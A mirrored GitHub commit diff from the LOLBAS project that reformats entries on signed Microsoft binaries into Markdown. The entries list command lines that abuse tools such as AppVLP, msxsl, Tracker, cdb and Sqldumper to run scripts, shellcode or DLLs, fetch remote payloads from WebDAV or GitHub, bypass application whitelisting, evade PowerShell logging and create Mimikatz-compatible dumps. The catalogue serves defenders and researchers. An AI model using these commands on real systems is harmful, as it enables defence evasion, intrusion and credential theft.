mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-26 20:22:24 +02:00
MD files generate from Script, and adjustments to readme
This commit is contained in:
24
OtherMSBinaries/Appvlp.exe.md
Normal file
24
OtherMSBinaries/Appvlp.exe.md
Normal file
@@ -0,0 +1,24 @@
|
||||
## Appvlp.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
AppVLP.exe \\webdav\calc.bat
|
||||
Executes calc.bat through AppVLP.exe
|
||||
|
||||
AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
|
||||
Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
|
||||
|
||||
AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
|
||||
Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://github.com/MoooKitty/Code-Execution
|
||||
* https://twitter.com/moo_hax/status/892388990686347264
|
||||
|
||||
* Full path:
|
||||
* C:\Program Files\Microsoft Office\root\client\appvlp.exe
|
||||
* C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
|
||||
|
||||
* Notes: Thanks to fab - @0rbz_ (No record), Will - @moo_hax (Code Execution)
|
||||
|
@@ -1,22 +0,0 @@
|
||||
---
|
||||
Name: Appvlp.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: AppVLP.exe \\webdav\calc.bat
|
||||
Description: Executes calc.bat through AppVLP.exe
|
||||
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
|
||||
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
|
||||
- Command: AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
|
||||
Description: Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
|
||||
Full Path:
|
||||
- C:\Program Files\Microsoft Office\root\client\appvlp.exe
|
||||
- C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://github.com/MoooKitty/Code-Execution
|
||||
- https://twitter.com/moo_hax/status/892388990686347264
|
||||
Notes: Thanks to fab - @0rbz_ (No record), Will - @moo_hax (Code Execution)
|
22
OtherMSBinaries/Bginfo.exe.md
Normal file
22
OtherMSBinaries/Bginfo.exe.md
Normal file
@@ -0,0 +1,22 @@
|
||||
## Bginfo.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
bginfo.exe bginfo.bgi /popup /nolicprompt
|
||||
Execute VBscript code that is referenced within the bginfo.bgi file.
|
||||
|
||||
"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt
|
||||
Execute bginfo.exe from a WebDAV server.
|
||||
|
||||
"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
|
||||
This style of execution may not longer work due to patch.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
|
||||
|
||||
* Full path:
|
||||
* No fixed path
|
||||
|
||||
* Notes: Thanks to Oddvar Moe - @oddvarmoe
|
||||
|
@@ -1,20 +0,0 @@
|
||||
---
|
||||
Name: Bginfo.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: bginfo.exe bginfo.bgi /popup /nolicprompt
|
||||
Description: Execute VBscript code that is referenced within the bginfo.bgi file.
|
||||
- Command: '"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt'
|
||||
Description: Execute bginfo.exe from a WebDAV server.
|
||||
- Command: '"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt'
|
||||
Description: This style of execution may not longer work due to patch.
|
||||
Full Path:
|
||||
- No fixed path
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
|
||||
Notes: Thanks to Oddvar Moe - @oddvarmoe
|
19
OtherMSBinaries/Cdb.exe.md
Normal file
19
OtherMSBinaries/Cdb.exe.md
Normal file
@@ -0,0 +1,19 @@
|
||||
## Cdb.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
cdb.exe -cf x64_calc.wds -o notepad.exe
|
||||
Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
|
||||
* https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
|
||||
* https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
|
||||
|
||||
* Full path:
|
||||
* C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
|
||||
* C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
|
||||
|
||||
* Notes: Thanks to Matt Graeber - @mattifestation
|
||||
|
@@ -1,19 +0,0 @@
|
||||
---
|
||||
Name: Cdb.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: cdb.exe -cf x64_calc.wds -o notepad.exe
|
||||
Description: Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe.
|
||||
Full Path:
|
||||
- C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
|
||||
- C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
|
||||
- https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
|
||||
- https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
|
||||
Notes: Thanks to Matt Graeber - @mattifestation
|
@@ -1,18 +0,0 @@
|
||||
---
|
||||
Name: csi.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: csi.exe file
|
||||
Description: Use csi.exe to run unsigned C# code.
|
||||
Full Path:
|
||||
- c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
|
||||
- c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/subTee/status/781208810723549188
|
||||
- https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
|
||||
Notes: Thanks to Casey Smith - @subtee
|
@@ -1,17 +0,0 @@
|
||||
---
|
||||
Name: dnx.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: dnx.exe consoleapp
|
||||
Description: Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies)
|
||||
Full Path:
|
||||
- N/A
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
|
||||
Notes: Thanks to Matt Nelson - @enigma0x3
|
||||
|
17
OtherMSBinaries/Dxcap.exe.md
Normal file
17
OtherMSBinaries/Dxcap.exe.md
Normal file
@@ -0,0 +1,17 @@
|
||||
## Dxcap.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Dxcap.exe -c C:\Windows\System32\notepad.exe
|
||||
Launch notepad as a subprocess of Dxcap.exe
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/harr0ey/status/992008180904419328
|
||||
|
||||
* Full path:
|
||||
* c:\Windows\System32\dxcap.exe
|
||||
* c:\Windows\SysWOW64\dxcap.exe
|
||||
|
||||
* Notes: Thanks to Matt harr0ey - @harr0ey
|
||||
|
@@ -1,17 +0,0 @@
|
||||
---
|
||||
Name: Dxcap.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Dxcap.exe -c C:\Windows\System32\notepad.exe
|
||||
Description: Launch notepad as a subprocess of Dxcap.exe
|
||||
Full Path:
|
||||
- c:\Windows\System32\dxcap.exe
|
||||
- c:\Windows\SysWOW64\dxcap.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/harr0ey/status/992008180904419328
|
||||
Notes: Thanks to Matt harr0ey - @harr0ey
|
22
OtherMSBinaries/Mftrace.exe.md
Normal file
22
OtherMSBinaries/Mftrace.exe.md
Normal file
@@ -0,0 +1,22 @@
|
||||
## Mftrace.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Mftrace.exe cmd.exe
|
||||
Launch cmd.exe as a subprocess of Mftrace.exe.
|
||||
|
||||
Mftrace.exe powershell.exe
|
||||
Launch cmd.exe as a subprocess of Mftrace.exe.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/0rbz_/status/988911181422186496 (Currently not accessible)
|
||||
|
||||
* Full path:
|
||||
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86
|
||||
* C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64
|
||||
* C:\Program Files (x86)\Windows Kits\10\bin\x86
|
||||
* C:\Program Files (x86)\Windows Kits\10\bin\x64
|
||||
|
||||
* Notes: Thanks to fabrizio - @0rbz_
|
||||
|
@@ -1,21 +0,0 @@
|
||||
---
|
||||
Name: Mftrace.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Mftrace.exe cmd.exe
|
||||
Description: Launch cmd.exe as a subprocess of Mftrace.exe.
|
||||
- Command: Mftrace.exe powershell.exe
|
||||
Description: Launch cmd.exe as a subprocess of Mftrace.exe.
|
||||
Full Path:
|
||||
- C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86
|
||||
- C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64
|
||||
- C:\Program Files (x86)\Windows Kits\10\bin\x86
|
||||
- C:\Program Files (x86)\Windows Kits\10\bin\x64
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/0rbz_/status/988911181422186496 (Currently not accessible)
|
||||
Notes: Thanks to fabrizio - @0rbz_
|
16
OtherMSBinaries/Msdeploy.exe.md
Normal file
16
OtherMSBinaries/Msdeploy.exe.md
Normal file
@@ -0,0 +1,16 @@
|
||||
## Msdeploy.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
|
||||
Launch calc.bat via msdeploy.exe.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/pabraeken/status/995837734379032576
|
||||
|
||||
* Full path:
|
||||
* C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe
|
||||
|
||||
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
|
@@ -1,16 +0,0 @@
|
||||
---
|
||||
Name: Msdeploy.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
|
||||
Description: Launch calc.bat via msdeploy.exe.
|
||||
Full Path:
|
||||
- C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/995837734379032576
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
@@ -1,19 +0,0 @@
|
||||
---
|
||||
Name: msxsl.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: msxsl.exe customers.xml script.xsl
|
||||
Description: Run COM Scriptlet code within the script.xsl file (local).
|
||||
- Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
|
||||
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
|
||||
Full Path:
|
||||
- N/A
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/subTee/status/877616321747271680
|
||||
- https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker
|
||||
Notes: Thanks to Casey Smith - @subTee (Finding), 3gstudent - @3gstudent (Remote)
|
@@ -1,15 +0,0 @@
|
||||
---
|
||||
Name: rcsi.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: rcsi.exe bypass.csx
|
||||
Description: Use embedded C# within the csx script to execute the code.
|
||||
Full Path: ''
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/
|
||||
Notes: Thanks to Matt Nelson - @enigma0x3
|
16
OtherMSBinaries/SQLToolsPS.exe.md
Normal file
16
OtherMSBinaries/SQLToolsPS.exe.md
Normal file
@@ -0,0 +1,16 @@
|
||||
## SQLToolsPS.exe
|
||||
* Functions: Execute, evade logging
|
||||
```
|
||||
|
||||
SQLToolsPS.exe -noprofile -command Start-Process calc.exe
|
||||
Run PowerShell scripts and commands.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/pabraeken/status/993298228840992768
|
||||
|
||||
* Full path:
|
||||
* C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
|
||||
|
||||
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
|
22
OtherMSBinaries/Sqldumper.exe.md
Normal file
22
OtherMSBinaries/Sqldumper.exe.md
Normal file
@@ -0,0 +1,22 @@
|
||||
## Sqldumper.exe
|
||||
* Functions: Dump process
|
||||
```
|
||||
|
||||
sqldumper.exe 464 0 0x0110
|
||||
Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp).
|
||||
|
||||
sqldumper.exe 540 0 0x01100:40
|
||||
0x01100:40 flag will create a Mimikatz compatibile dump file.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/countuponsec/status/910969424215232518
|
||||
* https://twitter.com/countuponsec/status/910977826853068800
|
||||
* https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se
|
||||
|
||||
* Full path:
|
||||
* C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
|
||||
* C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe
|
||||
|
||||
* Notes: Thanks to Luis Rocha - @countuponsec
|
||||
|
@@ -1,21 +0,0 @@
|
||||
---
|
||||
Name: Sqldumper.exe
|
||||
Description: Dump process
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: sqldumper.exe 464 0 0x0110
|
||||
Description: Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp).
|
||||
- Command: sqldumper.exe 540 0 0x01100:40
|
||||
Description: 0x01100:40 flag will create a Mimikatz compatibile dump file.
|
||||
Full Path:
|
||||
- C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
|
||||
- C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/countuponsec/status/910969424215232518
|
||||
- https://twitter.com/countuponsec/status/910977826853068800
|
||||
- https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se
|
||||
Notes: Thanks to Luis Rocha - @countuponsec
|
16
OtherMSBinaries/Sqlps.exe.md
Normal file
16
OtherMSBinaries/Sqlps.exe.md
Normal file
@@ -0,0 +1,16 @@
|
||||
## Sqlps.exe
|
||||
* Functions: Execute, evade logging
|
||||
```
|
||||
|
||||
Sqlps.exe -noprofile
|
||||
Drop into a SQL Server PowerShell console without Module and ScriptBlock Logging.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/bryon_/status/975835709587075072
|
||||
|
||||
* Full path:
|
||||
* C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
|
||||
|
||||
* Notes: Thanks to Bryon - @bryon_
|
||||
|
@@ -1,16 +0,0 @@
|
||||
---
|
||||
Name: Sqlps.exe
|
||||
Description: Execute, evade logging
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Sqlps.exe -noprofile
|
||||
Description: Drop into a SQL Server PowerShell console without Module and ScriptBlock Logging.
|
||||
Full Path:
|
||||
- C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/bryon_/status/975835709587075072
|
||||
Notes: Thanks to Bryon - @bryon_
|
@@ -1,16 +0,0 @@
|
||||
---
|
||||
Name: SQLToolsPS.exe
|
||||
Description: Execute, evade logging
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe
|
||||
Description: Run PowerShell scripts and commands.
|
||||
Full Path:
|
||||
- C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/993298228840992768
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
@@ -1,15 +0,0 @@
|
||||
---
|
||||
Name: te.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: te.exe bypass.wsc
|
||||
Description: Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file.
|
||||
Full Path: ''
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg
|
||||
Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s
|
17
OtherMSBinaries/Tracker.exe.md
Normal file
17
OtherMSBinaries/Tracker.exe.md
Normal file
@@ -0,0 +1,17 @@
|
||||
## Tracker.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
|
||||
Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/subTee/status/793151392185589760
|
||||
* https://attack.mitre.org/wiki/Execution
|
||||
|
||||
* Full path:
|
||||
*
|
||||
|
||||
* Notes: Thanks to Casey Smith - @subTee
|
||||
|
@@ -1,17 +0,0 @@
|
||||
---
|
||||
Name: Tracker.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
|
||||
Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
|
||||
Full Path: ''
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/subTee/status/793151392185589760
|
||||
- https://attack.mitre.org/wiki/Execution
|
||||
|
||||
Notes: Thanks to Casey Smith - @subTee
|
@@ -1,16 +0,0 @@
|
||||
---
|
||||
Name: vsjitdebugger.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: Vsjitdebugger.exe calc.exe
|
||||
Description: Executes calc.exe as a subprocess of Vsjitdebugger.exe.
|
||||
Full Path:
|
||||
- c:\windows\system32\vsjitdebugger.exe
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/pabraeken/status/990758590020452353
|
||||
Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
@@ -1,17 +0,0 @@
|
||||
---
|
||||
Name: winword.exe
|
||||
Description: Execute
|
||||
Author: ''
|
||||
Created: '2018-05-25'
|
||||
Categories: []
|
||||
Commands:
|
||||
- Command: winword.exe /l dllfile.dll
|
||||
Description: Launch DLL payload.
|
||||
Full Path:
|
||||
- c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
|
||||
Code Sample: []
|
||||
Detection: []
|
||||
Resources:
|
||||
- https://twitter.com/vysecurity/status/884755482707210241
|
||||
- https://twitter.com/Hexacorn/status/885258886428725250
|
||||
Notes: Thanks to Vincent Yiu - @@vysecurity (Cmd), Adam - @Hexacorn (Internals)
|
18
OtherMSBinaries/csi.exe.md
Normal file
18
OtherMSBinaries/csi.exe.md
Normal file
@@ -0,0 +1,18 @@
|
||||
## csi.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
csi.exe file
|
||||
Use csi.exe to run unsigned C# code.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/subTee/status/781208810723549188
|
||||
* https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
|
||||
|
||||
* Full path:
|
||||
* c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
|
||||
* c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
|
||||
|
||||
* Notes: Thanks to Casey Smith - @subtee
|
||||
|
16
OtherMSBinaries/dnx.exe.md
Normal file
16
OtherMSBinaries/dnx.exe.md
Normal file
@@ -0,0 +1,16 @@
|
||||
## dnx.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
dnx.exe consoleapp
|
||||
Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies)
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
|
||||
|
||||
* Full path:
|
||||
* N/A
|
||||
|
||||
* Notes: Thanks to Matt Nelson - @enigma0x3
|
||||
|
20
OtherMSBinaries/msxsl.exe.md
Normal file
20
OtherMSBinaries/msxsl.exe.md
Normal file
@@ -0,0 +1,20 @@
|
||||
## msxsl.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
msxsl.exe customers.xml script.xsl
|
||||
Run COM Scriptlet code within the script.xsl file (local).
|
||||
|
||||
msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
|
||||
Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/subTee/status/877616321747271680
|
||||
* https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker
|
||||
|
||||
* Full path:
|
||||
* N/A
|
||||
|
||||
* Notes: Thanks to Casey Smith - @subTee (Finding), 3gstudent - @3gstudent (Remote)
|
||||
|
16
OtherMSBinaries/rcsi.exe.md
Normal file
16
OtherMSBinaries/rcsi.exe.md
Normal file
@@ -0,0 +1,16 @@
|
||||
## rcsi.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
rcsi.exe bypass.csx
|
||||
Use embedded C# within the csx script to execute the code.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/
|
||||
|
||||
* Full path:
|
||||
*
|
||||
|
||||
* Notes: Thanks to Matt Nelson - @enigma0x3
|
||||
|
16
OtherMSBinaries/te.exe.md
Normal file
16
OtherMSBinaries/te.exe.md
Normal file
@@ -0,0 +1,16 @@
|
||||
## te.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
te.exe bypass.wsc
|
||||
Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg
|
||||
|
||||
* Full path:
|
||||
*
|
||||
|
||||
* Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s
|
||||
|
16
OtherMSBinaries/vsjitdebugger.exe.md
Normal file
16
OtherMSBinaries/vsjitdebugger.exe.md
Normal file
@@ -0,0 +1,16 @@
|
||||
## vsjitdebugger.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
Vsjitdebugger.exe calc.exe
|
||||
Executes calc.exe as a subprocess of Vsjitdebugger.exe.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/pabraeken/status/990758590020452353
|
||||
|
||||
* Full path:
|
||||
* c:\windows\system32\vsjitdebugger.exe
|
||||
|
||||
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken
|
||||
|
17
OtherMSBinaries/winword.exe.md
Normal file
17
OtherMSBinaries/winword.exe.md
Normal file
@@ -0,0 +1,17 @@
|
||||
## winword.exe
|
||||
* Functions: Execute
|
||||
```
|
||||
|
||||
winword.exe /l dllfile.dll
|
||||
Launch DLL payload.
|
||||
```
|
||||
|
||||
* Resources:
|
||||
* https://twitter.com/vysecurity/status/884755482707210241
|
||||
* https://twitter.com/Hexacorn/status/885258886428725250
|
||||
|
||||
* Full path:
|
||||
* c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
|
||||
|
||||
* Notes: Thanks to Vincent Yiu - @@vysecurity (Cmd), Adam - @Hexacorn (Internals)
|
||||
|
Reference in New Issue
Block a user